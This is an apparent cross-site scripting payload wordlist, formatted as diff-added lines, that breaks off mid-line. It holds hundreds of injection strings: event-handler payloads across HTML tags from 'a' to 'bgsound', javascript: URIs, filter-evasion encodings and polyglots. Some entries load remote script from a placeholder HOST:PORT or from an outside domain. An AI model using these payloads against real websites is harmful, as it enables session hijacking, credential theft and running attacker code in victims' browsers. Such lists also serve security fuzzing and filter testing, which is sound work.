+<x%2Fonxxx=1 +<x 1='1'onxxx=1 +<x 1="1"onxxx=1 +<x </onxxx=1 +<x 1=">" onxxx=1 +<http://onxxx%3D1/ +<x onxxx=alert(1) 1=' +<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> +'onload=alert(1)><svg/1=' +'>alert(1)</script><script/1=' +*/alert(1)</script><script>/* +*/alert(1)">'onload="/*<svg/1=' +`-alert(1)">'onload="`<svg/1=' +*/</script>'>alert(1)/*<script/1=' +<script>alert(1)</script> +<script src=javascript:alert(1)> +<iframe src=javascript:alert(1)> +<embed src=javascript:alert(1)> +<a href=javascript:alert(1)>click +<math><brute href=javascript:alert(1)>click +<form action=javascript:alert(1)><input type=submit> +<isindex action=javascript:alert(1) type=submit value=click> +<form><button formaction=javascript:alert(1)>click +<form><input formaction=javascript:alert(1) type=submit value=click> +<form><input formaction=javascript:alert(1) type=image value=click> +<form><input formaction=javascript:alert(1) type=image src=SOURCE> +<isindex formaction=javascript:alert(1) type=submit value=click> +<object data=javascript:alert(1)> +<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> +<svg><script xlink:href=data:,alert(1) /> +<math><brute xlink:href=javascript:alert(1)>click +<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> +<html ontouchstart=alert(1)> +<html ontouchend=alert(1)> +<html ontouchmove=alert(1)> +<html ontouchcancel=alert(1)> +<body onorientationchange=alert(1)> +"><img src=1 onerror=alert(1)>.gif +<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> +GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; +<script src="data:&comma;alert(1)// +"><script src=data:&comma;alert(1)// +<script src="//brutelogic.com.br&sol;1.js&num; +"><script src=//brutelogic.com.br&sol;1.js&num; +<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +<base href=//0> +<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) +<body onload=alert(1)> +<body onpageshow=alert(1)> +<body onfocus=alert(1)> +<body onhashchange=alert(1)><a href=#x>click this!#x +<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x +<body onscroll=alert(1)><br><br><br><br> +<br><br><br><br><br><br><br><br><br><br> +<br><br><br><br><br><br><br><br><br><br> +<br><br><br><br><br><br><x id=x>#x +<body onresize=alert(1)>press F12! +<body onhelp=alert(1)>press F1! (MSIE) +<marquee onstart=alert(1)> +<marquee loop=1 width=0 onfinish=alert(1)> +<audio src onloadstart=alert(1)> +<video onloadstart=alert(1)><source> +<input autofocus onblur=alert(1)> +<keygen autofocus onfocus=alert(1)> +<form onsubmit=alert(1)><input type=submit> +<select onchange=alert(1)><option>1<option>2 +<menu id=x contextmenu=x onshow=alert(1)>right click me! +alert`1` +alert&lpar;1&rpar; +alert&#x28;1&#x29 +alert&#40;1&#41 +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +navigator.vibrate(500) +eval(URL.slice(-8))>#alert(1) +eval(location.hash.slice(1)>#alert(1) +innerHTML=location.hash>#<script>alert(1)</script> +<a draggable="true" ondrag="alert(1)">test</a> +<a draggable="true" ondragend="alert(1)">test</a> +<a draggable="true" ondragenter="alert(1)">test</a> +<a draggable="true" ondragleave="alert(1)">test</a> +<a draggable="true" ondragstart="alert(1)">test</a> +<a id=x tabindex=1 onactivate=alert(1)></a> +<a id=x tabindex=1 onbeforeactivate=alert(1)></a> +<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus> +<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus> +<a id=x tabindex=1 onfocus=alert(1)></a> +<a id=x tabindex=1 onfocusin=alert(1)></a> +<a onbeforecopy="alert(1)" contenteditable>test</a> +<a onbeforecut="alert(1)" contenteditable>test</a> +<a onbeforepaste="alert(1)" contenteditable>test</a> +<a onblur=alert(1) tabindex=1 id=x></a><input autofocus> +<a onclick="alert(1)">test</a> +<a oncontextmenu="alert(1)">test</a> +<a oncopy="alert(1)" contenteditable>test</a> +<a oncut="alert(1)" contenteditable>test</a> +<a ondblclick="alert(1)">test</a> +<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus> +<a onkeydown="alert(1)" contenteditable>test</a> +<a onkeypress="alert(1)" contenteditable>test</a> +<a onkeyup="alert(1)" contenteditable>test</a> +<a onmousedown="alert(1)">test</a> +<a onmouseenter="alert(1)">test</a> +<a onmouseleave="alert(1)">test</a> +<a onmousemove="alert(1)">test</a> +<a onmouseout="alert(1)">test</a> +<a onmouseover="alert(1)">test</a> +<a onmouseup="alert(1)">test</a> +<a onpaste="alert(1)" contenteditable>test</a> +<abbr draggable="true" ondrag="alert(1)">test</abbr> +<abbr draggable="true" ondragend="alert(1)">test</abbr> +<abbr draggable="true" ondragenter="alert(1)">test</abbr> +<abbr draggable="true" ondragleave="alert(1)">test</abbr> +<abbr draggable="true" ondragstart="alert(1)">test</abbr> +<abbr id=x tabindex=1 onactivate=alert(1)></abbr> +<abbr id=x tabindex=1 onbeforeactivate=alert(1)></abbr> +<abbr id=x tabindex=1 onbeforedeactivate=alert(1)></abbr><input autofocus> +<abbr id=x tabindex=1 ondeactivate=alert(1)></abbr><input id=y autofocus> +<abbr id=x tabindex=1 onfocus=alert(1)></abbr> +<abbr id=x tabindex=1 onfocusin=alert(1)></abbr> +<abbr onbeforecopy="alert(1)" contenteditable>test</abbr> +<abbr onbeforecut="alert(1)" contenteditable>test</abbr> +<abbr onbeforepaste="alert(1)" contenteditable>test</abbr> +<abbr onblur=alert(1) tabindex=1 id=x></abbr><input autofocus> +<abbr onclick="alert(1)">test</abbr> +<abbr oncontextmenu="alert(1)">test</abbr> +<abbr oncopy="alert(1)" contenteditable>test</abbr> +<abbr oncut="alert(1)" contenteditable>test</abbr> +<abbr ondblclick="alert(1)">test</abbr> +<abbr onfocusout=alert(1) tabindex=1 id=x></abbr><input autofocus> +<abbr onkeydown="alert(1)" contenteditable>test</abbr> +<abbr onkeypress="alert(1)" contenteditable>test</abbr> +<abbr onkeyup="alert(1)" contenteditable>test</abbr> +<abbr onmousedown="alert(1)">test</abbr> +<abbr onmouseenter="alert(1)">test</abbr> +<abbr onmouseleave="alert(1)">test</abbr> +<abbr onmousemove="alert(1)">test</abbr> +<abbr onmouseout="alert(1)">test</abbr> +<abbr onmouseover="alert(1)">test</abbr> +<abbr onmouseup="alert(1)">test</abbr> +<abbr onpaste="alert(1)" contenteditable>test</abbr> +<acronym draggable="true" ondrag="alert(1)">test</acronym> +<acronym draggable="true" ondragend="alert(1)">test</acronym> +<acronym draggable="true" ondragenter="alert(1)">test</acronym> +<acronym draggable="true" ondragleave="alert(1)">test</acronym> +<acronym draggable="true" ondragstart="alert(1)">test</acronym> +<acronym id=x tabindex=1 onactivate=alert(1)></acronym> +<acronym id=x tabindex=1 onbeforeactivate=alert(1)></acronym> +<acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus> +<acronym id=x tabindex=1 ondeactivate=alert(1)></acronym><input id=y autofocus> +<acronym id=x tabindex=1 onfocus=alert(1)></acronym> +<acronym id=x tabindex=1 onfocusin=alert(1)></acronym> +<acronym onbeforecopy="alert(1)" contenteditable>test</acronym> +<acronym onbeforecut="alert(1)" contenteditable>test</acronym> +<acronym onbeforepaste="alert(1)" contenteditable>test</acronym> +<acronym onblur=alert(1) tabindex=1 id=x></acronym><input autofocus> +<acronym onclick="alert(1)">test</acronym> +<acronym oncontextmenu="alert(1)">test</acronym> +<acronym oncopy="alert(1)" contenteditable>test</acronym> +<acronym oncut="alert(1)" contenteditable>test</acronym> +<acronym ondblclick="alert(1)">test</acronym> +<acronym onfocusout=alert(1) tabindex=1 id=x></acronym><input autofocus> +<acronym onkeydown="alert(1)" contenteditable>test</acronym> +<acronym onkeypress="alert(1)" contenteditable>test</acronym> +<acronym onkeyup="alert(1)" contenteditable>test</acronym> +<acronym onmousedown="alert(1)">test</acronym> +<acronym onmouseenter="alert(1)">test</acronym> +<acronym onmouseleave="alert(1)">test</acronym> +<acronym onmousemove="alert(1)">test</acronym> +<acronym onmouseout="alert(1)">test</acronym> +<acronym onmouseover="alert(1)">test</acronym> +<acronym onmouseup="alert(1)">test</acronym> +<acronym onpaste="alert(1)" contenteditable>test</acronym> +<address draggable="true" ondrag="alert(1)">test</address> +<address draggable="true" ondragend="alert(1)">test</address> +<address draggable="true" ondragenter="alert(1)">test</address> +<address draggable="true" ondragleave="alert(1)">test</address> +<address draggable="true" ondragstart="alert(1)">test</address> +<address id=x tabindex=1 onactivate=alert(1)></address> +<address id=x tabindex=1 onbeforeactivate=alert(1)></address> +<address id=x tabindex=1 onbeforedeactivate=alert(1)></address><input autofocus> +<address id=x tabindex=1 ondeactivate=alert(1)></address><input id=y autofocus> +<address id=x tabindex=1 onfocus=alert(1)></address> +<address id=x tabindex=1 onfocusin=alert(1)></address> +<address onbeforecopy="alert(1)" contenteditable>test</address> +<address onbeforecut="alert(1)" contenteditable>test</address> +<address onbeforepaste="alert(1)" contenteditable>test</address> +<address onblur=alert(1) tabindex=1 id=x></address><input autofocus> +<address onclick="alert(1)">test</address> +<address oncontextmenu="alert(1)">test</address> +<address oncopy="alert(1)" contenteditable>test</address> +<address oncut="alert(1)" contenteditable>test</address> +<address ondblclick="alert(1)">test</address> +<address onfocusout=alert(1) tabindex=1 id=x></address><input autofocus> +<address onkeydown="alert(1)" contenteditable>test</address> +<address onkeypress="alert(1)" contenteditable>test</address> +<address onkeyup="alert(1)" contenteditable>test</address> +<address onmousedown="alert(1)">test</address> +<address onmouseenter="alert(1)">test</address> +<address onmouseleave="alert(1)">test</address> +<address onmousemove="alert(1)">test</address> +<address onmouseout="alert(1)">test</address> +<address onmouseover="alert(1)">test</address> +<address onmouseup="alert(1)">test</address> +<address onpaste="alert(1)" contenteditable>test</address> +<applet draggable="true" ondrag="alert(1)">test</applet> +<applet draggable="true" ondragend="alert(1)">test</applet> +<applet draggable="true" ondragenter="alert(1)">test</applet> +<applet draggable="true" ondragleave="alert(1)">test</applet> +<applet draggable="true" ondragstart="alert(1)">test</applet> +<applet id=x tabindex=1 onactivate=alert(1)></applet> +<applet id=x tabindex=1 onbeforeactivate=alert(1)></applet> +<applet id=x tabindex=1 onbeforedeactivate=alert(1)></applet><input autofocus> +<applet id=x tabindex=1 ondeactivate=alert(1)></applet><input id=y autofocus> +<applet id=x tabindex=1 onfocus=alert(1)></applet> +<applet id=x tabindex=1 onfocusin=alert(1)></applet> +<applet onbeforecopy="alert(1)" contenteditable>test</applet> +<applet onbeforecut="alert(1)" contenteditable>test</applet> +<applet onbeforepaste="alert(1)" contenteditable>test</applet> +<applet onblur=alert(1) tabindex=1 id=x></applet><input autofocus> +<applet onclick="alert(1)">test</applet> +<applet oncontextmenu="alert(1)">test</applet> +<applet oncopy="alert(1)" contenteditable>test</applet> +<applet oncut="alert(1)" contenteditable>test</applet> +<applet ondblclick="alert(1)">test</applet> +<applet onfocusout=alert(1) tabindex=1 id=x></applet><input autofocus> +<applet onkeydown="alert(1)" contenteditable>test</applet> +<applet onkeypress="alert(1)" contenteditable>test</applet> +<applet onkeyup="alert(1)" contenteditable>test</applet> +<applet onmousedown="alert(1)">test</applet> +<applet onmouseenter="alert(1)">test</applet> +<applet onmouseleave="alert(1)">test</applet> +<applet onmousemove="alert(1)">test</applet> +<applet onmouseout="alert(1)">test</applet> +<applet onmouseover="alert(1)">test</applet> +<applet onmouseup="alert(1)">test</applet> +<applet onpaste="alert(1)" contenteditable>test</applet> +<applet onreadystatechange=alert(1)></applet> +<area draggable="true" ondrag="alert(1)">test</area> +<area draggable="true" ondragend="alert(1)">test</area> +<area draggable="true" ondragenter="alert(1)">test</area> +<area draggable="true" ondragleave="alert(1)">test</area> +<area draggable="true" ondragstart="alert(1)">test</area> +<area id=x tabindex=1 onactivate=alert(1)></area> +<area id=x tabindex=1 onbeforeactivate=alert(1)></area> +<area id=x tabindex=1 onbeforedeactivate=alert(1)></area><input autofocus> +<area id=x tabindex=1 ondeactivate=alert(1)></area><input id=y autofocus> +<area onbeforecopy="alert(1)" contenteditable>test</area> +<area onbeforecut="alert(1)" contenteditable>test</area> +<area onbeforepaste="alert(1)" contenteditable>test</area> +<area onblur=alert(1) tabindex=1 id=x></area><input autofocus> +<area onclick="alert(1)">test</area> +<area oncontextmenu="alert(1)">test</area> +<area oncopy="alert(1)" contenteditable>test</area> +<area oncut="alert(1)" contenteditable>test</area> +<area ondblclick="alert(1)">test</area> +<area onfocusout=alert(1) tabindex=1 id=x></area><input autofocus> +<area onkeydown="alert(1)" contenteditable>test</area> +<area onkeypress="alert(1)" contenteditable>test</area> +<area onkeyup="alert(1)" contenteditable>test</area> +<area onmousedown="alert(1)">test</area> +<area onmouseenter="alert(1)">test</area> +<area onmouseleave="alert(1)">test</area> +<area onmousemove="alert(1)">test</area> +<area onmouseout="alert(1)">test</area> +<area onmouseover="alert(1)">test</area> +<area onmouseup="alert(1)">test</area> +<area onpaste="alert(1)" contenteditable>test</area> +<article draggable="true" ondrag="alert(1)">test</article> +<article draggable="true" ondragend="alert(1)">test</article> +<article draggable="true" ondragenter="alert(1)">test</article> +<article draggable="true" ondragleave="alert(1)">test</article> +<article draggable="true" ondragstart="alert(1)">test</article> +<article id=x tabindex=1 onactivate=alert(1)></article> +<article id=x tabindex=1 onbeforeactivate=alert(1)></article> +<article id=x tabindex=1 onbeforedeactivate=alert(1)></article><input autofocus> +<article id=x tabindex=1 ondeactivate=alert(1)></article><input id=y autofocus> +<article id=x tabindex=1 onfocus=alert(1)></article> +<article id=x tabindex=1 onfocusin=alert(1)></article> +<article onbeforecopy="alert(1)" contenteditable>test</article> +<article onbeforecut="alert(1)" contenteditable>test</article> +<article onbeforepaste="alert(1)" contenteditable>test</article> +<article onblur=alert(1) tabindex=1 id=x></article><input autofocus> +<article onclick="alert(1)">test</article> +<article oncontextmenu="alert(1)">test</article> +<article oncopy="alert(1)" contenteditable>test</article> +<article oncut="alert(1)" contenteditable>test</article> +<article ondblclick="alert(1)">test</article> +<article onfocusout=alert(1) tabindex=1 id=x></article><input autofocus> +<article onkeydown="alert(1)" contenteditable>test</article> +<article onkeypress="alert(1)" contenteditable>test</article> +<article onkeyup="alert(1)" contenteditable>test</article> +<article onmousedown="alert(1)">test</article> +<article onmouseenter="alert(1)">test</article> +<article onmouseleave="alert(1)">test</article> +<article onmousemove="alert(1)">test</article> +<article onmouseout="alert(1)">test</article> +<article onmouseover="alert(1)">test</article> +<article onmouseup="alert(1)">test</article> +<article onpaste="alert(1)" contenteditable>test</article> +<aside draggable="true" ondrag="alert(1)">test</aside> +<aside draggable="true" ondragend="alert(1)">test</aside> +<aside draggable="true" ondragenter="alert(1)">test</aside> +<aside draggable="true" ondragleave="alert(1)">test</aside> +<aside draggable="true" ondragstart="alert(1)">test</aside> +<aside id=x tabindex=1 onactivate=alert(1)></aside> +<aside id=x tabindex=1 onbeforeactivate=alert(1)></aside> +<aside id=x tabindex=1 onbeforedeactivate=alert(1)></aside><input autofocus> +<aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus> +<aside id=x tabindex=1 onfocus=alert(1)></aside> +<aside id=x tabindex=1 onfocusin=alert(1)></aside> +<aside onbeforecopy="alert(1)" contenteditable>test</aside> +<aside onbeforecut="alert(1)" contenteditable>test</aside> +<aside onbeforepaste="alert(1)" contenteditable>test</aside> +<aside onblur=alert(1) tabindex=1 id=x></aside><input autofocus> +<aside onclick="alert(1)">test</aside> +<aside oncontextmenu="alert(1)">test</aside> +<aside oncopy="alert(1)" contenteditable>test</aside> +<aside oncut="alert(1)" contenteditable>test</aside> +<aside ondblclick="alert(1)">test</aside> +<aside onfocusout=alert(1) tabindex=1 id=x></aside><input autofocus> +<aside onkeydown="alert(1)" contenteditable>test</aside> +<aside onkeypress="alert(1)" contenteditable>test</aside> +<aside onkeyup="alert(1)" contenteditable>test</aside> +<aside onmousedown="alert(1)">test</aside> +<aside onmouseenter="alert(1)">test</aside> +<aside onmouseleave="alert(1)">test</aside> +<aside onmousemove="alert(1)">test</aside> +<aside onmouseout="alert(1)">test</aside> +<aside onmouseover="alert(1)">test</aside> +<aside onmouseup="alert(1)">test</aside> +<aside onpaste="alert(1)" contenteditable>test</aside> +<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio draggable="true" ondrag="alert(1)">test</audio> +<audio draggable="true" ondragend="alert(1)">test</audio> +<audio draggable="true" ondragenter="alert(1)">test</audio> +<audio draggable="true" ondragleave="alert(1)">test</audio> +<audio draggable="true" ondragstart="alert(1)">test</audio> +<audio id=x controls onfocus=alert(1) id=x><source src="validaudio.wav"></audio> +<audio id=x controls onfocusin=alert(1) id=x><source src="validaudio.wav"></audio> +<audio id=x tabindex=1 onactivate=alert(1)></audio> +<audio id=x tabindex=1 onbeforeactivate=alert(1)></audio> +<audio id=x tabindex=1 onbeforedeactivate=alert(1)></audio><input autofocus> +<audio id=x tabindex=1 ondeactivate=alert(1)></audio><input id=y autofocus> +<audio onbeforecopy="alert(1)" contenteditable>test</audio> +<audio onbeforecut="alert(1)" contenteditable>test</audio> +<audio onbeforepaste="alert(1)" contenteditable>test</audio> +<audio onblur=alert(1) tabindex=1 id=x></audio><input autofocus> +<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio onclick="alert(1)">test</audio> +<audio oncontextmenu="alert(1)">test</audio> +<audio oncopy="alert(1)" contenteditable>test</audio> +<audio oncut="alert(1)" contenteditable>test</audio> +<audio ondblclick="alert(1)">test</audio> +<audio onfocusout=alert(1) tabindex=1 id=x></audio><input autofocus> +<audio onkeydown="alert(1)" contenteditable>test</audio> +<audio onkeypress="alert(1)" contenteditable>test</audio> +<audio onkeyup="alert(1)" contenteditable>test</audio> +<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio onmousedown="alert(1)">test</audio> +<audio onmouseenter="alert(1)">test</audio> +<audio onmouseleave="alert(1)">test</audio> +<audio onmousemove="alert(1)">test</audio> +<audio onmouseout="alert(1)">test</audio> +<audio onmouseover="alert(1)">test</audio> +<audio onmouseup="alert(1)">test</audio> +<audio onpaste="alert(1)" contenteditable>test</audio> +<audio src/onerror=alert(1)> +<b draggable="true" ondrag="alert(1)">test</b> +<b draggable="true" ondragend="alert(1)">test</b> +<b draggable="true" ondragenter="alert(1)">test</b> +<b draggable="true" ondragleave="alert(1)">test</b> +<b draggable="true" ondragstart="alert(1)">test</b> +<b id=x tabindex=1 onactivate=alert(1)></b> +<b id=x tabindex=1 onbeforeactivate=alert(1)></b> +<b id=x tabindex=1 onbeforedeactivate=alert(1)></b><input autofocus> +<b id=x tabindex=1 ondeactivate=alert(1)></b><input id=y autofocus> +<b id=x tabindex=1 onfocus=alert(1)></b> +<b id=x tabindex=1 onfocusin=alert(1)></b> +<b onbeforecopy="alert(1)" contenteditable>test</b> +<b onbeforecut="alert(1)" contenteditable>test</b> +<b onbeforepaste="alert(1)" contenteditable>test</b> +<b onblur=alert(1) tabindex=1 id=x></b><input autofocus> +<b onclick="alert(1)">test</b> +<b oncontextmenu="alert(1)">test</b> +<b oncopy="alert(1)" contenteditable>test</b> +<b oncut="alert(1)" contenteditable>test</b> +<b ondblclick="alert(1)">test</b> +<b onfocusout=alert(1) tabindex=1 id=x></b><input autofocus> +<b onkeydown="alert(1)" contenteditable>test</b> +<b onkeypress="alert(1)" contenteditable>test</b> +<b onkeyup="alert(1)" contenteditable>test</b> +<b onmousedown="alert(1)">test</b> +<b onmouseenter="alert(1)">test</b> +<b onmouseleave="alert(1)">test</b> +<b onmousemove="alert(1)">test</b> +<b onmouseout="alert(1)">test</b> +<b onmouseover="alert(1)">test</b> +<b onmouseup="alert(1)">test</b> +<b onpaste="alert(1)" contenteditable>test</b> +<base draggable="true" ondrag="alert(1)">test</base> +<base draggable="true" ondragend="alert(1)">test</base> +<base draggable="true" ondragenter="alert(1)">test</base> +<base draggable="true" ondragleave="alert(1)">test</base> +<base draggable="true" ondragstart="alert(1)">test</base> +<base id=x tabindex=1 onactivate=alert(1)></base> +<base id=x tabindex=1 onbeforeactivate=alert(1)></base> +<base id=x tabindex=1 onbeforedeactivate=alert(1)></base><input autofocus> +<base id=x tabindex=1 ondeactivate=alert(1)></base><input id=y autofocus> +<base id=x tabindex=1 onfocus=alert(1)></base> +<base id=x tabindex=1 onfocusin=alert(1)></base> +<base onbeforecopy="alert(1)" contenteditable>test</base> +<base onbeforecut="alert(1)" contenteditable>test</base> +<base onbeforepaste="alert(1)" contenteditable>test</base> +<base onblur=alert(1) tabindex=1 id=x></base><input autofocus> +<base onclick="alert(1)">test</base> +<base oncontextmenu="alert(1)">test</base> +<base oncopy="alert(1)" contenteditable>test</base> +<base oncut="alert(1)" contenteditable>test</base> +<base ondblclick="alert(1)">test</base> +<base onfocusout=alert(1) tabindex=1 id=x></base><input autofocus> +<base onkeydown="alert(1)" contenteditable>test</base> +<base onkeypress="alert(1)" contenteditable>test</base> +<base onkeyup="alert(1)" contenteditable>test</base> +<base onmousedown="alert(1)">test</base> +<base onmouseenter="alert(1)">test</base> +<base onmouseleave="alert(1)">test</base> +<base onmousemove="alert(1)">test</base> +<base onmouseout="alert(1)">test</base> +<base onmouseover="alert(1)">test</base> +<base onmouseup="alert(1)">test</base> +<base onpaste="alert(1)" contenteditable>test</base> +<basefont draggable="true" ondrag="alert(1)">test</basefont> +<basefont draggable="true" ondragend="alert(1)">test</basefont> +<basefont draggable="true" ondragenter="alert(1)">test</basefont> +<basefont draggable="true" ondragleave="alert(1)">test</basefont> +<basefont draggable="true" ondragstart="alert(1)">test</basefont> +<basefont id=x tabindex=1 onactivate=alert(1)></basefont> +<basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont> +<basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus> +<basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus> +<basefont id=x tabindex=1 onfocus=alert(1)></basefont> +<basefont id=x tabindex=1 onfocusin=alert(1)></basefont> +<basefont onbeforecopy="alert(1)" contenteditable>test</basefont> +<basefont onbeforecut="alert(1)" contenteditable>test</basefont> +<basefont onbeforepaste="alert(1)" contenteditable>test</basefont> +<basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus> +<basefont onclick="alert(1)">test</basefont> +<basefont oncontextmenu="alert(1)">test</basefont> +<basefont oncopy="alert(1)" contenteditable>test</basefont> +<basefont oncut="alert(1)" contenteditable>test</basefont> +<basefont ondblclick="alert(1)">test</basefont> +<basefont onfocusout=alert(1) tabindex=1 id=x></basefont><input autofocus> +<basefont onkeydown="alert(1)" contenteditable>test</basefont> +<basefont onkeypress="alert(1)" contenteditable>test</basefont> +<basefont onkeyup="alert(1)" contenteditable>test</basefont> +<basefont onmousedown="alert(1)">test</basefont> +<basefont onmouseenter="alert(1)">test</basefont> +<basefont onmouseleave="alert(1)">test</basefont> +<basefont onmousemove="alert(1)">test</basefont> +<basefont onmouseout="alert(1)">test</basefont> +<basefont onmouseover="alert(1)">test</basefont> +<basefont onmouseup="alert(1)">test</basefont> +<basefont onpaste="alert(1)" contenteditable>test</basefont> +<bdi draggable="true" ondrag="alert(1)">test</bdi> +<bdi draggable="true" ondragend="alert(1)">test</bdi> +<bdi draggable="true" ondragenter="alert(1)">test</bdi> +<bdi draggable="true" ondragleave="alert(1)">test</bdi> +<bdi draggable="true" ondragstart="alert(1)">test</bdi> +<bdi id=x tabindex=1 onactivate=alert(1)></bdi> +<bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi> +<bdi id=x tabindex=1 onbeforedeactivate=alert(1)></bdi><input autofocus> +<bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><input id=y autofocus> +<bdi id=x tabindex=1 onfocus=alert(1)></bdi> +<bdi id=x tabindex=1 onfocusin=alert(1)></bdi> +<bdi onbeforecopy="alert(1)" contenteditable>test</bdi> +<bdi onbeforecut="alert(1)" contenteditable>test</bdi> +<bdi onbeforepaste="alert(1)" contenteditable>test</bdi> +<bdi onblur=alert(1) tabindex=1 id=x></bdi><input autofocus> +<bdi onclick="alert(1)">test</bdi> +<bdi oncontextmenu="alert(1)">test</bdi> +<bdi oncopy="alert(1)" contenteditable>test</bdi> +<bdi oncut="alert(1)" contenteditable>test</bdi> +<bdi ondblclick="alert(1)">test</bdi> +<bdi onfocusout=alert(1) tabindex=1 id=x></bdi><input autofocus> +<bdi onkeydown="alert(1)" contenteditable>test</bdi> +<bdi onkeypress="alert(1)" contenteditable>test</bdi> +<bdi onkeyup="alert(1)" contenteditable>test</bdi> +<bdi onmousedown="alert(1)">test</bdi> +<bdi onmouseenter="alert(1)">test</bdi> +<bdi onmouseleave="alert(1)">test</bdi> +<bdi onmousemove="alert(1)">test</bdi> +<bdi onmouseout="alert(1)">test</bdi> +<bdi onmouseover="alert(1)">test</bdi> +<bdi onmouseup="alert(1)">test</bdi> +<bdi onpaste="alert(1)" contenteditable>test</bdi> +<bdo draggable="true" ondrag="alert(1)">test</bdo> +<bdo draggable="true" ondragend="alert(1)">test</bdo> +<bdo draggable="true" ondragenter="alert(1)">test</bdo> +<bdo draggable="true" ondragleave="alert(1)">test</bdo> +<bdo draggable="true" ondragstart="alert(1)">test</bdo> +<bdo id=x tabindex=1 onactivate=alert(1)></bdo> +<bdo id=x tabindex=1 onbeforeactivate=alert(1)></bdo> +<bdo id=x tabindex=1 onbeforedeactivate=alert(1)></bdo><input autofocus> +<bdo id=x tabindex=1 ondeactivate=alert(1)></bdo><input id=y autofocus> +<bdo id=x tabindex=1 onfocus=alert(1)></bdo> +<bdo id=x tabindex=1 onfocusin=alert(1)></bdo> +<bdo onbeforecopy="alert(1)" contenteditable>test</bdo> +<bdo onbeforecut="alert(1)" contenteditable>test</bdo> +<bdo onbeforepaste="alert(1)" contenteditable>test</bdo> +<bdo onblur=alert(1) tabindex=1 id=x></bdo><input autofocus> +<bdo onclick="alert(1)">test</bdo> +<bdo oncontextmenu="alert(1)">test</bdo> +<bdo oncopy="alert(1)" contenteditable>test</bdo> +<bdo oncut="alert(1)" contenteditable>test</bdo> +<bdo ondblclick="alert(1)">test</bdo> +<bdo onfocusout=alert(1) tabindex=1 id=x></bdo><input autofocus> +<bdo onkeydown="alert(1)" contenteditable>test</bdo> +<bdo onkeypress="alert(1)" contenteditable>test</bdo> +<bdo onkeyup="alert(1)" contenteditable>test</bdo> +<bdo onmousedown="alert(1)">test</bdo> +<bdo onmouseenter="alert(1)">test</bdo> +<bdo onmouseleave="alert(1)">test</bdo> +<bdo onmousemove="alert(1)">test</bdo> +<bdo onmouseout="alert(1)">test</bdo> +<bdo onmouseover="alert(1)">test</bdo> +<bdo onmouseup="alert(1)">test</bdo> +<bdo onpaste="alert(1)" contenteditable>test</bdo> +<bgsound draggable="true" ondrag="alert(1)">test</bgsound> +<bgsound draggable="true" ondragend="alert(1)">test</bgsound> +<bgsound draggable="true" ondragenter="alert(1)">test</bgsound> +<bgsound draggable="true" ondragleave="alert(1)">test</bgsound> +<bgsound draggable="true" ondragstart="alert(1)">test</bgsound> +<bgsound id=x tabindex=1 onactivate=alert(1)></bgsound> +<bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound> +<bgsound id=x tabindex=1 onbeforedeactivate=alert(1)></bgsound><input autofocus> +<bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus> +<bgsound id=x tabindex=1 onfocus=alert(1)></bgsound> +<bgsound id=x tabindex=1 onfocusin=alert(1)></bgsound> +<bgsound onbeforecopy="alert(1)" contenteditable>test</bgsound> +<bgsound onbeforecut="alert(1)" contenteditable>test</bgsound> +<bgsound onbeforepaste="alert(1)" contenteditable>test</bgsound> +<bgsound onblur=alert(1) tabindex=1 id=x></bgsound><input autofocus> +<bgsound onclick="alert(1)">test</bgsound> +<bgsound oncontextmenu="alert(1)">test</bgsound> +<bgsound oncopy="alert(1)" contenteditable>test</bgsound> +<bgsound oncut="alert(1)" contenteditable>test</bgsound> +<bgsound ondblclick="alert(1)">test</bgsound> +<bgsound onfocusout=alert(1) tabindex=1 id=x></bgsound><input autofocus> +<bgsound onkeydown="alert(1)" contenteditable>test</bgsound> +<bgsound onkeypress="alert(1)" contenteditable>test</bgsound> +<bgsound onkeyup="alert(1)" contenteditable>test</bgsound> +<bgsound onmousedown="alert(1)">test</bgsound> +<bgsound onmouseenter="alert(1)">test</bgsound> +<bgsound onmouseleave="alert(1)">test</bgsound> +<bgsound onmousemove="alert(1)">test</bgsound> +<bgsound onmouseout="alert(1)">test</bgsound> +<bgsound 